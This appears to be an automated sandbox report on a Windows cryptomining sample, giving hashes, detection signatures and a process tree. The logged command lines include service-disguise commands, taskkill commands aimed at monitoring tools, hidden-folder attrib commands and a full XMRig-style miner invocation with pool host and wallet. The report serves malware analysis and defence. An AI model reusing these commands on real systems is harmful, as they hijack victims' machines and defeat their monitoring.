Analysis
max time kernel: 149s
max time network: 147s
platform: windows10-2004_x64
resource: win10v2004-20240508-en
resource tags: arch:x64 arch:x86 image:win10v2004-20240508-en locale:en-us os:windows10-2004-x64 system
submitted: 22/05/2024, 15:02
Behavioral task: behavioral1
Sample: 67aa4626a523e1eac3b90552be1cd4ad_JaffaCakes118.exe
Resource: win7-20240419-en
General
Target: 67aa4626a523e1eac3b90552be1cd4ad_JaffaCakes118.exe
Size: 1.5MB
MD5: 67aa4626a523e1eac3b90552be1cd4ad
SHA1: 9eb3bd7d1131a820a87b20a1631bc7b6bf9140c9
SHA256: ec4438d1b316a2d106e5070cc7881f9f9d9bcfaf51614bf1c768cc374bdc4ae2
SHA512: bfc6c4098a1c550ee41544b084eb0d2488577e656b5106a445a553a37a7a80e6b8a84be7f1467d3ca6c31046191f32c4feae31a56c5e16093b71fec7ea7d37de
SSDEEP: 24576:+c/nsodv5hQpu6q8K8MZLQJTkeOfAn/RZDtbQLf7u+YAgNdwuL8wmKiVME:/nHB5hYb4x2ftbQ2+owugwE9
Malware Config
Signatures
-
XMRig Miner payload 3 IoCs
resource yara_rule
behavioral2/memory/2784-20-0x0000000000400000-0x00000000009C1000-memory.dmp xmrig
behavioral2/files/0x0007000000023432-23.dat xmrig
behavioral2/files/0x0008000000023430-33.dat xmrig
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation 67aa4626a523e1eac3b90552be1cd4ad_JaffaCakes118.exe -
Deletes itself 1 IoCs
pid Process 4948 WScript.exe -
Executes dropped EXE 12 IoCs
pid Process 4336 svchost.exe 4916 svchost.exe 2604 svchost.exe 4980 svchost.exe 3420 svchost.exe 4824 conhost.exe 1012 svchost.exe 4584 svchost.exe 556 svchost.exe 3620 svchost.exe 2544 svchost.exe 1760 KvMonXP.exe
UPX packed file 2 IoCs
resource yara_rule
behavioral2/memory/2784-0-0x0000000000400000-0x00000000009C1000-memory.dmp upx
behavioral2/memory/2784-20-0x0000000000400000-0x00000000009C1000-memory.dmp upx
Drops file in Windows directory 64 IoCs
description ioc Process File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification 
\??\c:\windows\Fonts\svchost.exe conhost.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe -
Launches sc.exe 6 IoCs
Sc.exe is a Windows utility to control services on the system.
pid Process 3980 sc.exe 4080 sc.exe 1088 sc.exe 3636 sc.exe 4128 sc.exe 3660 sc.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
Kills process with taskkill 6 IoCs
pid Process 4416 taskkill.exe 2596 taskkill.exe 2808 taskkill.exe 2712 taskkill.exe 880 taskkill.exe 3516 taskkill.exe -
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings 67aa4626a523e1eac3b90552be1cd4ad_JaffaCakes118.exe -
Runs net.exe
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 4824 conhost.exe 4824 conhost.exe 4824 conhost.exe 4824 conhost.exe 4824 conhost.exe 4824 conhost.exe 4824 conhost.exe 4824 conhost.exe 4824 conhost.exe 4824 conhost.exe 4824 conhost.exe 4824 conhost.exe 4824 conhost.exe 4824 conhost.exe 4824 conhost.exe 4824 conhost.exe 4824 conhost.exe 4824 conhost.exe 4824 conhost.exe 4824 conhost.exe 4824 conhost.exe 4824 conhost.exe 4824 conhost.exe 4824 conhost.exe 4824 conhost.exe 4824 conhost.exe 4824 conhost.exe 4824 conhost.exe 4824 conhost.exe 4824 conhost.exe 4824 conhost.exe 4824 conhost.exe 4824 conhost.exe 4824 conhost.exe 4824 conhost.exe 4824 conhost.exe 4824 conhost.exe 4824 conhost.exe 4824 conhost.exe 4824 conhost.exe 4824 conhost.exe 4824 conhost.exe 4824 conhost.exe 4824 conhost.exe 4824 conhost.exe 4824 conhost.exe 4824 conhost.exe 4824 conhost.exe 4824 conhost.exe 4824 conhost.exe 4824 conhost.exe 4824 conhost.exe 4824 conhost.exe 4824 conhost.exe 4824 conhost.exe 4824 conhost.exe 4824 conhost.exe 4824 conhost.exe 4824 conhost.exe 4824 conhost.exe 4824 conhost.exe 4824 conhost.exe 4824 conhost.exe 4824 conhost.exe -
Suspicious use of AdjustPrivilegeToken 7 IoCs
description pid Process Token: SeDebugPrivilege 2808 taskkill.exe Token: SeDebugPrivilege 880 taskkill.exe Token: SeDebugPrivilege 3516 taskkill.exe Token: SeDebugPrivilege 2712 taskkill.exe Token: SeDebugPrivilege 4416 taskkill.exe Token: SeDebugPrivilege 2596 taskkill.exe Token: SeLockMemoryPrivilege 1760 KvMonXP.exe -
Suspicious use of SetWindowsHookEx 4 IoCs
pid Process 2784 67aa4626a523e1eac3b90552be1cd4ad_JaffaCakes118.exe 2784 67aa4626a523e1eac3b90552be1cd4ad_JaffaCakes118.exe 4824 conhost.exe 4824 conhost.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2784 wrote to memory of 832 2784 67aa4626a523e1eac3b90552be1cd4ad_JaffaCakes118.exe 82 PID 2784 wrote to memory of 832 2784 67aa4626a523e1eac3b90552be1cd4ad_JaffaCakes118.exe 82 PID 2784 wrote to memory of 832 2784 67aa4626a523e1eac3b90552be1cd4ad_JaffaCakes118.exe 82 PID 2784 wrote to memory of 3620 2784 67aa4626a523e1eac3b90552be1cd4ad_JaffaCakes118.exe 83 PID 2784 wrote to memory of 3620 2784 67aa4626a523e1eac3b90552be1cd4ad_JaffaCakes118.exe 83 PID 2784 wrote to memory of 3620 2784 67aa4626a523e1eac3b90552be1cd4ad_JaffaCakes118.exe 83 PID 2784 wrote to memory of 3660 2784 67aa4626a523e1eac3b90552be1cd4ad_JaffaCakes118.exe 84 PID 2784 wrote to memory of 3660 2784 67aa4626a523e1eac3b90552be1cd4ad_JaffaCakes118.exe 84 PID 2784 wrote to memory of 3660 2784 67aa4626a523e1eac3b90552be1cd4ad_JaffaCakes118.exe 84 PID 2784 wrote to memory of 1892 2784 67aa4626a523e1eac3b90552be1cd4ad_JaffaCakes118.exe 85 PID 2784 wrote to memory of 1892 2784 67aa4626a523e1eac3b90552be1cd4ad_JaffaCakes118.exe 85 PID 2784 wrote to memory of 1892 2784 67aa4626a523e1eac3b90552be1cd4ad_JaffaCakes118.exe 85 PID 2784 wrote to memory of 4128 2784 67aa4626a523e1eac3b90552be1cd4ad_JaffaCakes118.exe 86 PID 2784 wrote to memory of 4128 2784 67aa4626a523e1eac3b90552be1cd4ad_JaffaCakes118.exe 86 PID 2784 wrote to memory of 4128 2784 67aa4626a523e1eac3b90552be1cd4ad_JaffaCakes118.exe 86 PID 2784 wrote to memory of 1584 2784 67aa4626a523e1eac3b90552be1cd4ad_JaffaCakes118.exe 87 PID 2784 wrote to memory of 1584 2784 67aa4626a523e1eac3b90552be1cd4ad_JaffaCakes118.exe 87 PID 2784 wrote to memory of 1584 2784 67aa4626a523e1eac3b90552be1cd4ad_JaffaCakes118.exe 87 PID 2784 wrote to memory of 3636 2784 67aa4626a523e1eac3b90552be1cd4ad_JaffaCakes118.exe 88 PID 2784 wrote to memory of 3636 2784 67aa4626a523e1eac3b90552be1cd4ad_JaffaCakes118.exe 88 PID 2784 wrote to memory of 3636 2784 67aa4626a523e1eac3b90552be1cd4ad_JaffaCakes118.exe 88 PID 2784 wrote to memory of 1088 
2784 67aa4626a523e1eac3b90552be1cd4ad_JaffaCakes118.exe 89 PID 2784 wrote to memory of 1088 2784 67aa4626a523e1eac3b90552be1cd4ad_JaffaCakes118.exe 89 PID 2784 wrote to memory of 1088 2784 67aa4626a523e1eac3b90552be1cd4ad_JaffaCakes118.exe 89 PID 2784 wrote to memory of 512 2784 67aa4626a523e1eac3b90552be1cd4ad_JaffaCakes118.exe 90 PID 2784 wrote to memory of 512 2784 67aa4626a523e1eac3b90552be1cd4ad_JaffaCakes118.exe 90 PID 2784 wrote to memory of 512 2784 67aa4626a523e1eac3b90552be1cd4ad_JaffaCakes118.exe 90 PID 2784 wrote to memory of 4080 2784 67aa4626a523e1eac3b90552be1cd4ad_JaffaCakes118.exe 91 PID 2784 wrote to memory of 4080 2784 67aa4626a523e1eac3b90552be1cd4ad_JaffaCakes118.exe 91 PID 2784 wrote to memory of 4080 2784 67aa4626a523e1eac3b90552be1cd4ad_JaffaCakes118.exe 91 PID 2784 wrote to memory of 1588 2784 67aa4626a523e1eac3b90552be1cd4ad_JaffaCakes118.exe 92 PID 2784 wrote to memory of 1588 2784 67aa4626a523e1eac3b90552be1cd4ad_JaffaCakes118.exe 92 PID 2784 wrote to memory of 1588 2784 67aa4626a523e1eac3b90552be1cd4ad_JaffaCakes118.exe 92 PID 2784 wrote to memory of 3980 2784 67aa4626a523e1eac3b90552be1cd4ad_JaffaCakes118.exe 93 PID 2784 wrote to memory of 3980 2784 67aa4626a523e1eac3b90552be1cd4ad_JaffaCakes118.exe 93 PID 2784 wrote to memory of 3980 2784 67aa4626a523e1eac3b90552be1cd4ad_JaffaCakes118.exe 93 PID 2784 wrote to memory of 4336 2784 67aa4626a523e1eac3b90552be1cd4ad_JaffaCakes118.exe 96 PID 2784 wrote to memory of 4336 2784 67aa4626a523e1eac3b90552be1cd4ad_JaffaCakes118.exe 96 PID 2784 wrote to memory of 4916 2784 67aa4626a523e1eac3b90552be1cd4ad_JaffaCakes118.exe 97 PID 2784 wrote to memory of 4916 2784 67aa4626a523e1eac3b90552be1cd4ad_JaffaCakes118.exe 97 PID 2784 wrote to memory of 2604 2784 67aa4626a523e1eac3b90552be1cd4ad_JaffaCakes118.exe 98 PID 2784 wrote to memory of 2604 2784 67aa4626a523e1eac3b90552be1cd4ad_JaffaCakes118.exe 98 PID 2784 wrote to memory of 4980 2784 67aa4626a523e1eac3b90552be1cd4ad_JaffaCakes118.exe 99 PID 2784 
wrote to memory of 4980 2784 67aa4626a523e1eac3b90552be1cd4ad_JaffaCakes118.exe 99 PID 3620 wrote to memory of 5112 3620 net.exe 114 PID 3620 wrote to memory of 5112 3620 net.exe 114 PID 3620 wrote to memory of 5112 3620 net.exe 114 PID 832 wrote to memory of 4864 832 cmd.exe 115 PID 832 wrote to memory of 4864 832 cmd.exe 115 PID 832 wrote to memory of 4864 832 cmd.exe 115 PID 1584 wrote to memory of 4516 1584 net.exe 116 PID 1584 wrote to memory of 4516 1584 net.exe 116 PID 1584 wrote to memory of 4516 1584 net.exe 116 PID 1892 wrote to memory of 1812 1892 net.exe 117 PID 1892 wrote to memory of 1812 1892 net.exe 117 PID 1892 wrote to memory of 1812 1892 net.exe 117 PID 512 wrote to memory of 4632 512 net.exe 118 PID 512 wrote to memory of 4632 512 net.exe 118 PID 512 wrote to memory of 4632 512 net.exe 118 PID 1588 wrote to memory of 4460 1588 net.exe 119 PID 1588 wrote to memory of 4460 1588 net.exe 119 PID 1588 wrote to memory of 4460 1588 net.exe 119 PID 2784 wrote to memory of 4948 2784 67aa4626a523e1eac3b90552be1cd4ad_JaffaCakes118.exe 121 PID 2784 wrote to memory of 4948 2784 67aa4626a523e1eac3b90552be1cd4ad_JaffaCakes118.exe 121 -
Views/modifies file attributes 1 TTPs 64 IoCs
pid Process 2880 attrib.exe 2896 attrib.exe 1484 attrib.exe 880 attrib.exe 872 attrib.exe 2620 attrib.exe 3588 attrib.exe 1568 attrib.exe 1508 attrib.exe 4412 attrib.exe 3648 attrib.exe 4224 attrib.exe 1340 attrib.exe 1504 attrib.exe 3784 attrib.exe 740 attrib.exe 1728 attrib.exe 1312 attrib.exe 3284 attrib.exe 2916 attrib.exe 4816 attrib.exe 4588 attrib.exe 4536 attrib.exe 3980 attrib.exe 4148 attrib.exe 760 attrib.exe 2740 attrib.exe 4252 attrib.exe 2608 attrib.exe 4972 attrib.exe 2620 attrib.exe 372 attrib.exe 2524 attrib.exe 3412 attrib.exe 4864 attrib.exe 3724 attrib.exe 3412 attrib.exe 1960 attrib.exe 4956 attrib.exe 3320 attrib.exe 2808 attrib.exe 1096 attrib.exe 1308 attrib.exe 2128 attrib.exe 3404 attrib.exe 3904 attrib.exe 868 attrib.exe 3304 attrib.exe 4348 attrib.exe 5012 attrib.exe 1172 attrib.exe 1476 attrib.exe 1928 attrib.exe 3152 attrib.exe 3724 attrib.exe 3612 attrib.exe 1504 attrib.exe 3008 attrib.exe 4524 attrib.exe 2472 attrib.exe 3532 attrib.exe 4128 attrib.exe 3792 attrib.exe 224 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\67aa4626a523e1eac3b90552be1cd4ad_JaffaCakes118.exe"C:\Users\Admin\AppData\Local\Temp\67aa4626a523e1eac3b90552be1cd4ad_JaffaCakes118.exe"1⤵
- Checks computer location settings
- Modifies registry class
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2784 -
C:\Windows\SysWOW64\cmd.execmd /c attrib -s -h -r -a %SystemRoot%\Fonts2⤵
- Suspicious use of WriteProcessMemory
PID:832 -
C:\Windows\SysWOW64\attrib.exeattrib -s -h -r -a C:\Windows\Fonts3⤵
- Views/modifies file attributes
PID:4864
-
-
-
C:\Windows\SysWOW64\net.exenet stop Microsarver2⤵
- Suspicious use of WriteProcessMemory
PID:3620 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop Microsarver3⤵PID:5112
-
-
-
C:\Windows\SysWOW64\sc.exesc delete Microsarver2⤵
- Launches sc.exe
PID:3660
-
-
C:\Windows\SysWOW64\net.exenet stop Samsorver2⤵
- Suspicious use of WriteProcessMemory
PID:1892 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop Samsorver3⤵PID:1812
-
-
-
C:\Windows\SysWOW64\sc.exesc delete Samsorver2⤵
- Launches sc.exe
PID:4128
-
-
C:\Windows\SysWOW64\net.exenet stop lanmanserver /y2⤵
- Suspicious use of WriteProcessMemory
PID:1584 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop lanmanserver /y3⤵PID:4516
-
-
-
C:\Windows\SysWOW64\sc.exesc config lanmanserver start= DISABLED 2>nul2⤵
- Launches sc.exe
PID:3636
-
-
C:\Windows\SysWOW64\sc.exesc delete lanmanserver2⤵
- Launches sc.exe
PID:1088
-
-
C:\Windows\SysWOW64\net.exenet stop mssecsvc2.02⤵
- Suspicious use of WriteProcessMemory
PID:512 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop mssecsvc2.03⤵PID:4632
-
-
-
C:\Windows\SysWOW64\sc.exesc delete mssecsvc2.02⤵
- Launches sc.exe
PID:4080
-
-
C:\Windows\SysWOW64\net.exenet stop mssecsvc2.12⤵
- Suspicious use of WriteProcessMemory
PID:1588 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop mssecsvc2.13⤵PID:4460
-
-
-
C:\Windows\SysWOW64\sc.exesc delete mssecsvc2.12⤵
- Launches sc.exe
PID:3980
-
-
\??\c:\windows\Fonts\svchost.exec:\windows\Fonts\svchost.exe install Microsarver c:\windows\Fonts\conhost.exe2⤵
- Executes dropped EXE
PID:4336
-
-
\??\c:\windows\Fonts\svchost.exec:\windows\Fonts\svchost.exe set Microsarver DisplayName Network Location Service2⤵
- Executes dropped EXE
PID:4916
-
-
\??\c:\windows\Fonts\svchost.exec:\windows\Fonts\svchost.exe set Microsarver Description Provides performance library information from Windows Management.2⤵
- Executes dropped EXE
PID:2604
-
-
\??\c:\windows\Fonts\svchost.exec:\windows\Fonts\svchost.exe start Microsarver2⤵
- Executes dropped EXE
PID:4980
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\tem.vbs"2⤵
- Deletes itself
PID:4948
-
-
\??\c:\windows\Fonts\svchost.exec:\windows\Fonts\svchost.exe1⤵
- Executes dropped EXE
PID:3420 -
\??\c:\windows\Fonts\conhost.exe"c:\windows\Fonts\conhost.exe"2⤵
- Executes dropped EXE
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:4824 -
C:\Windows\SysWOW64\cmd.execmd /c attrib -s -h -r -a %SystemRoot%\Fonts3⤵PID:1984
-
C:\Windows\SysWOW64\attrib.exeattrib -s -h -r -a C:\Windows\Fonts4⤵
- Views/modifies file attributes
PID:740
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵PID:4176
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
- Views/modifies file attributes
PID:868
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /im taskmgr.exe /f /T3⤵PID:4788
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im taskmgr.exe /f /T4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2808
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /im rundll32.exe /f /T3⤵PID:3520
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im rundll32.exe /f /T4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:880
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /im autoruns.exe /f /T3⤵PID:4976
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im autoruns.exe /f /T4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3516
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /im perfmon.exe /f /T3⤵PID:2256
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im perfmon.exe /f /T4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2596
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /im procexp.exe /f /T3⤵PID:3044
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im procexp.exe /f /T4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4416
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /im ProcessHacker.exe /f /T3⤵PID:2620
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im ProcessHacker.exe /f /T4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2712
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c attrib -s -h -r -a %SystemRoot%\Fonts3⤵PID:2396
-
C:\Windows\SysWOW64\attrib.exeattrib -s -h -r -a C:\Windows\Fonts4⤵
- Drops file in Windows directory
PID:2916
-
-
-
\??\c:\windows\Fonts\svchost.exec:\windows\Fonts\svchost.exe install Samsorver KvMonXP -o stratum+tcp://max.csrss.website:5555 -u 49tzxeXRHecDF4bHMDFU4iRpVqHTJiYJiJxv4MgkD2JMCjw3UQSWV3qBbZqDHfsNEbDzU8hLq9UqH4MBoxy36RBvFuVfasv -p x -k --donate-level=1 --max-cpu-usage=50 --print-time=5 --nicehash3⤵
- Executes dropped EXE
PID:1012
-
-
\??\c:\windows\Fonts\svchost.exec:\windows\Fonts\svchost.exe set Samsorver DisplayName WMI Performance Services3⤵
- Executes dropped EXE
PID:4584
-
-
\??\c:\windows\Fonts\svchost.exec:\windows\Fonts\svchost.exe set Samsorver Description Identify computers that are connected to the network, collect and store the properties of these networks, and notify the application when they are changed.3⤵
- Executes dropped EXE
PID:3620
-
-
\??\c:\windows\Fonts\svchost.exec:\windows\Fonts\svchost.exe start Samsorver3⤵
- Executes dropped EXE
PID:556
-
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵PID:2740
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Views/modifies file attributes
PID:2608
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵PID:760
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵PID:2008
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵PID:4224
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
PID:3504
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵PID:3492
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
- Views/modifies file attributes
PID:1728
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵PID:3716
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
PID:404
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵PID:2312
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Views/modifies file attributes
PID:1484
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵PID:1012
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Views/modifies file attributes
PID:4128
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵PID:4272
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Views/modifies file attributes
PID:3724
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵PID:2724
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
- Views/modifies file attributes
PID:3284
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵PID:2568
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
PID:3996
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵PID:4812
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵PID:440
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵PID:5088
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵PID:740
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵PID:3868
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Views/modifies file attributes
PID:4412
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵PID:4556
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
PID:2536
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵PID:3652
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵PID:3168
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵PID:4356
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵PID:4332
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵PID:3784
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵PID:4600
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵PID:4940
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Views/modifies file attributes
PID:3648
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵PID:3768
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Views/modifies file attributes
PID:4972
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵PID:4496
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵PID:2396
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵PID:224
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
PID:5112
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵PID:4888
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵PID:2512
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵PID:1052
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵PID:4780
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵PID:2180
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵PID:5008
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵PID:3720
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Views/modifies file attributes
PID:4224
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵PID:2944
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵PID:4412
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵PID:4712
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
- Views/modifies file attributes
PID:4956
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵PID:1172
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
PID:3492
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵PID:3444
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
- Views/modifies file attributes
PID:3304
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵PID:2392
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Views/modifies file attributes
PID:2620
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵PID:2264
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
PID:4464
-
-
-
